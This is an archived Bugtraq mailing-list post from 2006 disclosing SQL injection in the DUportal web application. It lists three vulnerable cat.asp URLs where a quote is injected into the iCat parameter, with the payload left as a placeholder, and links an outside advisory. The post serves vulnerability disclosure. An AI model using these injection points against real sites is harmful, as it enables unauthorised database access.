[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
SQL Injection On DUportal
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: SQL Injection On DUportal
- From: outlaw@xxxxxxxxxxxxxxxxx
- Date: 26 Apr 2006 05:11:38 -0000
Proof of Concept:
/News/cat.asp?iCat=' [SQL INJECTION]&iChannel=1&nChannel=News
/Articles/cat.asp?iCat=' [SQL INJECTION]&iChannel=2&nChannel=Articles
/Pictures/cat.asp?iCat=' [SQL INJECTION]&iChannel=3&nChannel=Pictures
Original advisory:http://www.aria-security.net/advisory/duportal.txt